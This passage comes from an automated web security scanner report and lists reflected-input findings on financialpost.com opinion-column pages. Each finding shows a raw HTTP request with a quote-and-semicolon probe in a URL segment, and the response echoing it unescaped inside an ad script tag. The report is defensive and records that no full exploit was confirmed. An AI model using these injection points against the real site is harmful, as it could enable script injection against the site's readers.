1.205. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10172'%3be803ff19434 was submitted in the REST URL parameter 2. This input was echoed as 10172';e803ff19434 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists10172'%3be803ff19434/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78669
Expires: Sun, 19 Dec 2010 03:13:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists10172';e803ff19434/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists10172';e803ff19434;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99836883?">
...[SNIP]...

1.206. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf31'%3b503052c6ac3 was submitted in the REST URL parameter 4. This input was echoed as ebf31';503052c6ac3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Diabetes+RDSP+confusion/3996673ebf31'%3b503052c6ac3/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64067
Expires: Sun, 19 Dec 2010 03:13:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/diabetes-rdsp-confusion/3996673ebf31';503052c6ac3/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=diabetes-rdsp-confusion;kw=3996673ebf31';503052c6ac3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.207. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6915'%3bc70b98c8ed7 was submitted in the REST URL parameter 5. This input was echoed as e6915';c70b98c8ed7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Diabetes+RDSP+confusion/3996673/e6915'%3bc70b98c8ed7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44167


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/diabetes%20rdsp%20confusion/3996673/e6915';c70b98c8ed7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=diabetes%20rdsp%20confusion;kw=3996673;kw=e6915';c70b98c8ed7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+sur
...[SNIP]...

1.208. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6aacf'%3b2dcc50d2bea was submitted in the REST URL parameter 1. This input was echoed as 6aacf';2dcc50d2bea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion6aacf'%3b2dcc50d2bea/columnists/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81434
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion6aacf';2dcc50d2bea/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion6aacf';2dcc50d2bea;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=35050549?">
...[SNIP]...

1.209. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ee06'%3bd1610b97601 was submitted in the REST URL parameter 2. This input was echoed as 6ee06';d1610b97601 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists6ee06'%3bd1610b97601/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76267
Expires: Sun, 19 Dec 2010 03:13:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists6ee06';d1610b97601/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists6ee06';d1610b97601;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=74713967?">
...[SNIP]...

1.210. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d84'%3b589204317ff was submitted in the REST URL parameter 4. This input was echoed as b5d84';589204317ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686b5d84'%3b589204317ff/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70018
Expires: Sun, 19 Dec 2010 03:13:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/gordon-brown-fairy-tale/3996686b5d84';589204317ff/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=gordon-brown-fairy-tale;kw=3996686b5d84';589204317ff;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.211. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8d99'%3b477af5f2dc was submitted in the REST URL parameter 5. This input was echoed as b8d99';477af5f2dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686/b8d99'%3b477af5f2dc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44189


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/gordon%20brown%20fairy%20tale/3996686/b8d99';477af5f2dc/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=gordon%20brown%20fairy%20tale;kw=3996686;kw=b8d99';477af5f2dc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+su
...[SNIP]...

1.212. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caad9'%3bfe560cef6f1 was submitted in the REST URL parameter 1. This input was echoed as caad9';fe560cef6f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinioncaad9'%3bfe560cef6f1/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81153
Expires: Sun, 19 Dec 2010 03:13:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinioncaad9';fe560cef6f1/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinioncaad9';fe560cef6f1;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94873299?">
...[SNIP]...

1.213. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fea'%3bac5e157b03 was submitted in the REST URL parameter 2. This input was echoed as a4fea';ac5e157b03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsa4fea'%3bac5e157b03/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75080
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsa4fea';ac5e157b03/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsa4fea';ac5e157b03;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13084670?">
...[SNIP]...

1.214. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a83e8'%3b1465d38c955 was submitted in the REST URL parameter 4. This input was echoed as a83e8';1465d38c955 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670a83e8'%3b1465d38c955/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71352
Expires: Sun, 19 Dec 2010 03:13:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/hoping-santa-puts-inflation-stocking/3996670a83e8';1465d38c955/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=hoping-santa-puts-inflation-stocking;kw=3996670a83e8';1465d38c955;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa
...[SNIP]...

1.215. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faabd'%3b92cf6eecfea was submitted in the REST URL parameter 5. This input was echoed as faabd';92cf6eecfea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/faabd'%3b92cf6eecfea HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44507


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/hoping%20santa%20puts%20inflation%20stocking/3996670/faabd';92cf6eecfea/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=hoping%20santa%20puts%20inflation%20stocking;kw=3996670;kw=faabd';92cf6eecfea;kw=npo;kw=fpo;tile='+dartad_tile+';
...[SNIP]...

1.216. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ad4f'%3be55a38084cf was submitted in the REST URL parameter 1. This input was echoed as 8ad4f';e55a38084cf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion8ad4f'%3be55a38084cf/columnists/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82077
Expires: Sun, 19 Dec 2010 03:14:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion8ad4f';e55a38084cf/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion8ad4f';e55a38084cf;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24013518?">
...[SNIP]...

1.217. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a104'%3b5a547f5c299 was submitted in the REST URL parameter 2. This input was echoed as 3a104';5a547f5c299 in the application's response.

